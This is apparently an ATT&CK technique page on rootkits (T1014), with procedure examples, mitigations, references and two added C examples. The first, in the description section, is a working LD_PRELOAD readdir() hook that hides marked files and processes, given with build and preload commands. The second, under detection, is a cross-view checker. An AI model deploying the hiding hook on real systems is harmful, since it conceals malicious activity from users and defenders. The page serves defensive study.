
Rootkit

Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting (hooking) and modifying the operating system API calls that supply system information, so that every tool built on those calls reports a filtered view. (Citation: Symantec Windows Rootkits) Rootkits, or rootkit-enabling functionality, may reside at the user or kernel level of the operating system or lower, including a hypervisor, the Master Boot Record, or system firmware such as UEFI. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
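The user-level variant described above, and attributed in the procedure examples to Rocke, Hildegard and Umbreon (the modified Azazel library), works by interposing libc functions from a library listed in /etc/ld.so.preload. The following is an added example written for this page; it is not code from ATT&CK or from any of the malware families listed. The marker string `demo_hide`, the library name and the glibc soname `libc.so.6` are assumptions chosen for the demo.

```c
/* Added example, not code from the ATT&CK page or from any listed malware:
 * a minimal user-mode rootkit hook of the kind attributed to Rocke,
 * Hildegard and Umbreon/Azazel. Registered in /etc/ld.so.preload (or via
 * LD_PRELOAD) it interposes libc's readdir() and drops every directory
 * entry whose name contains HIDE_MARKER, so `ls` and /proc walkers such as
 * `ps` never see matching files or PIDs. HIDE_MARKER, the library name and
 * LIBC_SONAME are assumptions for the demo.
 *
 * Build:  gcc -shared -fPIC -o libdemo_hide.so demo_hide.c -ldl
 * Try:    touch /tmp/demo_hide_me; LD_PRELOAD=$PWD/libdemo_hide.so ls /tmp
 */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stddef.h>
#include <string.h>

#define HIDE_MARKER "demo_hide"   /* assumed marker; real implants use their own */
#define LIBC_SONAME "libc.so.6"   /* assumed: glibc on Linux */

/* The hiding rule on its own, so it can be exercised without preloading. */
int should_hide(const char *name)
{
    return name != NULL && strstr(name, HIDE_MARKER) != NULL;
}

typedef struct dirent *(*readdir_fn)(DIR *);

/* Resolve the genuine readdir straight from libc. Looking it up by soname
 * instead of dlsym(RTLD_NEXT, ...) keeps the example independent of
 * feature-test macros; both patterns occur in real preload rootkits. */
static readdir_fn real_readdir(void)
{
    static readdir_fn fn;
    if (!fn) {
        void *libc = dlopen(LIBC_SONAME, RTLD_LAZY);
        if (libc)
            *(void **)(&fn) = dlsym(libc, "readdir");
    }
    return fn;
}

/* Interposed readdir(): pull entries from the real one and skip those the
 * filter wants hidden. 32-bit programs built with large-file support call
 * readdir64() instead, which is why Hildegard hooked both variants. */
struct dirent *readdir(DIR *dirp)
{
    readdir_fn next = real_readdir();
    if (!next)
        return NULL;   /* cannot reach the real readdir: return "empty" rather than crash */
    struct dirent *ent;
    while ((ent = next(dirp)) != NULL) {
        if (!should_hide(ent->d_name))
            return ent;
    }
    return NULL;
}
```

Because the filter sits inside libc's readdir(), anything that enumerates /proc or a filesystem through libc (ls, ps, find, most EDR user-mode collectors) is affected at once, while a program that issues the getdents64 system call directly still sees the hidden entries; that asymmetry is what the detection section below relies on.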

ID: T1014
Tactic(s): Defense Evasion
Platforms: Linux, macOS, Windows
Data Sources: Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Version: 1.1
Created: 31 May 2017
Last Modified: 05 May 2022

Procedure Examples

Name / Description
Ebury

Ebury has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)

Winnti Group

Winnti Group used a rootkit to modify typical server functionality.(Citation: Kaspersky Winnti April 2013)

APT41

APT41 deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)

Rocke

Rocke has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)

Carberp

Carberp has used user mode rootkit techniques to remain hidden on the system.(Citation: Prevx Carberp March 2011)

Ramsay

Ramsay has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)

Drovorub

Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view.(Citation: NSA/FBI Drovorub August 2020)

HTRAN

HTRAN can install a rootkit to hide network connections from the host OS.(Citation: NCSC Joint Report Public Tools)

HIDEDRV

HIDEDRV is a rootkit that hides certain operating system artifacts.(Citation: ESET Sednit Part 3)

TeamTNT

TeamTNT has used rootkits such as the open-source Diamorphine rootkit and their custom bots to hide cryptocurrency mining activities on the machine.(Citation: Trend Micro TeamTNT) (Citation: Cisco Talos Intelligence Group)

Skidmap

Skidmap is a kernel-mode rootkit that has the ability to hook system calls to hide specific files and fake network and CPU-related statistics to make the CPU load of the infected machine always appear low.(Citation: Trend Micro Skidmap)

Umbreon

Umbreon hides from defenders by hooking libc function calls, hiding artifacts that would reveal its presence, such as the user account it creates to provide access and undermining strace, a tool often used to identify malware.(Citation: Umbreon Trend Micro)

Stuxnet

Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.(Citation: Symantec W.32 Stuxnet Dossier)

Hacking Team UEFI Rootkit

Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)

HiddenWasp

HiddenWasp uses a rootkit to hook and implement functions on the system.(Citation: Intezer HiddenWasp Map 2019)

Hildegard

Hildegard has modified /etc/ld.so.preload to overwrite readdir() and readdir64().(Citation: Unit 42 Hildegard Malware)

APT28

APT28 has used a UEFI (Unified Extensible Firmware Interface) rootkit known as LoJax.(Citation: Symantec APT28 Oct 2018)(Citation: ESET LoJax Sept 2018)

Hikit

Hikit is a Rootkit that has been used by Axiom.(Citation: FireEye Hikit Rootkit) (Citation: FireEye HIKIT Rootkit Part 2)

Winnti for Linux

Winnti for Linux has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)

Zeroaccess

Zeroaccess is a kernel-mode rootkit.(Citation: Sophos ZeroAccess)

LoJax

LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)

Uroburos

Uroburos is a rootkit used by Turla.(Citation: Kaspersky Turla)

WarzoneRAT

WarzoneRAT can include a rootkit to hide processes, files, and startup.(Citation: Check Point Warzone Feb 2020)

Caterpillar WebShell

Caterpillar WebShell has a module to use a rootkit on a system.(Citation: ClearSky Lebanese Cedar Jan 2021)

PoisonIvy

PoisonIvy starts a rootkit from a malicious file dropped to disk.(Citation: Symantec Darkmoon Aug 2005)

Mitigations

Mitigation / Description
Rootkit Mitigation

Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it using application control (allowlisting) tools (Citation: Beechey 2010) such as AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Detection

Some rootkit protections may be built into anti-virus or operating system software. Dedicated rootkit detection tools look for specific rootkit behaviors, most often by comparing two views of the same data (a high-level API view against a raw syscall or offline view) and reporting any difference, since a rootkit can only filter the interfaces it hooks. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit) The procedure examples above also point at two cheap Linux checks: the contents of /etc/ld.so.preload (Rocke, Hildegard) and the set of loaded kernel modules (Drovorub, Diamorphine, Skidmap).
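The cross-view idea applied to the ld.so.preload hooks in the procedure examples, as an added example written for this page (not an ATT&CK or vendor tool): /proc is enumerated once through libc's opendir/readdir, which a preload rootkit can hook, and once through the raw getdents64 system call, which bypasses libc. PIDs present in the raw view but absent from the libc view are being hidden from user space. The buffer size and PID limit are assumptions; kernel-mode rootkits such as Drovorub hook below this point and need a different second view.

```c
/* Added example (not from the ATT&CK page): cross-view detection of
 * user-mode /proc hiding. Build: gcc -o procxview procxview.c ; run as any
 * user. The MAX_PIDS limit and the 32 KiB getdents buffer are assumptions. */
#define _GNU_SOURCE
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

#define MAX_PIDS 65536   /* assumption: covers the default pid_max */

/* Record layout the kernel writes for getdents64 (see linux/dirent.h);
 * declared here so the example does not need kernel headers. */
struct raw_dirent64 {
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* /proc entries whose name is all digits are process directories. */
int is_pid_name(const char *s)
{
    if (!s || !*s) return 0;
    for (; *s; s++)
        if (*s < '0' || *s > '9') return 0;
    return 1;
}

/* View 1: /proc through libc, the path a preload rootkit can hook. */
size_t list_proc_libc(int *out, size_t max)
{
    size_t n = 0;
    DIR *d = opendir("/proc");
    if (!d) return 0;
    struct dirent *e;
    while (n < max && (e = readdir(d)) != NULL)
        if (is_pid_name(e->d_name))
            out[n++] = atoi(e->d_name);
    closedir(d);
    return n;
}

/* View 2: /proc through the raw getdents64 syscall, bypassing libc. */
size_t list_proc_raw(int *out, size_t max)
{
    size_t n = 0;
    static long long storage[4096];          /* 32 KiB, 8-byte aligned */
    char *buf = (char *)storage;
    int fd = open("/proc", O_RDONLY | O_DIRECTORY);
    if (fd < 0) return 0;
    for (;;) {
        long got = syscall(SYS_getdents64, fd, buf, sizeof storage);
        if (got <= 0) break;
        for (long off = 0; off < got && n < max;) {
            struct raw_dirent64 *e = (struct raw_dirent64 *)(buf + off);
            if (is_pid_name(e->d_name))
                out[n++] = atoi(e->d_name);
            off += e->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* Raw kill(pid, 0): 0 or EPERM means the process still exists. Used to
 * discard PIDs that merely exited between the two enumerations. */
int pid_alive_raw(int pid)
{
    return syscall(SYS_kill, pid, 0) == 0 || errno == EPERM;
}

/* Pure comparison: PIDs in `raw` that are absent from `seen`. */
size_t find_hidden(const int *seen, size_t nseen, const int *raw, size_t nraw,
                   int *hidden, size_t max)
{
    size_t nh = 0;
    for (size_t i = 0; i < nraw && nh < max; i++) {
        int found = 0;
        for (size_t j = 0; j < nseen; j++)
            if (seen[j] == raw[i]) { found = 1; break; }
        if (!found) hidden[nh++] = raw[i];
    }
    return nh;
}

int main(void)
{
    static int seen[MAX_PIDS], raw[MAX_PIDS], hidden[MAX_PIDS];
    size_t nseen = list_proc_libc(seen, MAX_PIDS);
    size_t nraw  = list_proc_raw(raw, MAX_PIDS);
    size_t nh = find_hidden(seen, nseen, raw, nraw, hidden, MAX_PIDS);
    int alerts = 0;
    for (size_t i = 0; i < nh; i++) {
        if (!pid_alive_raw(hidden[i])) continue;   /* exited, not hidden */
        printf("PID %d visible to getdents64 but not to libc readdir\n", hidden[i]);
        alerts++;
    }
    printf("libc view: %zu pids, raw view: %zu pids, hidden: %d\n", nseen, nraw, alerts);
    return alerts ? 1 : 0;
}
```

The re-check with a raw kill(pid, 0) matters in practice: processes exit between the two scans, and without it a busy host produces false alerts. Statically linking the checker, or running it from a clean boot medium against the mounted disk, defeats a preload rootkit entirely; against a kernel-module rootkit the raw syscall view is itself filtered, so the second view has to come from elsewhere (memory forensics, or PIDs that answer kill(pid, 0) but have no /proc entry).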

References

  1. Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.
  2. Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.
  3. Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017.
  4. Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.
  5. NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
  6. Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.
  7. Sanmillan, I. (2019, May 29). HiddenWasp Malware Stings Targeted Linux Systems. Retrieved June 24, 2019.
  8. Fernando Mercês. (2016, September 5). Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.
  9. Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.
  10. Harakhavik, Y. (2020, February 3). Warzone: Behind the enemy lines. Retrieved December 17, 2021.
  11. ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.
  12. The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.
  13. ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
  14. ClearSky Cyber Security. (2021, January). “Lebanese Cedar” APT Global Lebanese Espionage Campaign Leveraging Web Servers. Retrieved February 10, 2021.
  15. Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.
  16. Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.
  17. Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.
  18. Kaspersky Lab's Global Research and Analysis Team. (2013, April 11). Winnti. More than just a game. Retrieved February 8, 2017.
  19. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
  20. Wyke, J. (2012, April). ZeroAccess. Retrieved July 18, 2016.
  21. Vachon, F. (2017, October 30). Windigo Still not Windigone: An Ebury Update. Retrieved February 10, 2021.
  22. Giuliani, M., Allievi, A. (2011, February 28). Carberp - a modular information stealing trojan. Retrieved July 15, 2020.
  23. Sanmillan, I. (2020, May 13). Ramsay: A cyber-espionage toolkit tailored for air-gapped networks. Retrieved May 27, 2020.
  24. Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020.
  25. Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
  26. Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
  27. Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.
  28. Fiser, D., Oliveira, A. (n.d.). Tracking the Activities of TeamTNT: A Closer Look at a Cloud-Focused Malicious Actor Group. Retrieved September 22, 2021.
  29. Darin Smith. (2022, April 21). TeamTNT targeting AWS, Alibaba. Retrieved August 4, 2022.
  30. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018.
  31. Lin, P. (2015, July 13). Hacking Team Uses UEFI BIOS Rootkit to Keep RCS 9 Agent in Target Systems. Retrieved December 11, 2015.
  32. Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.
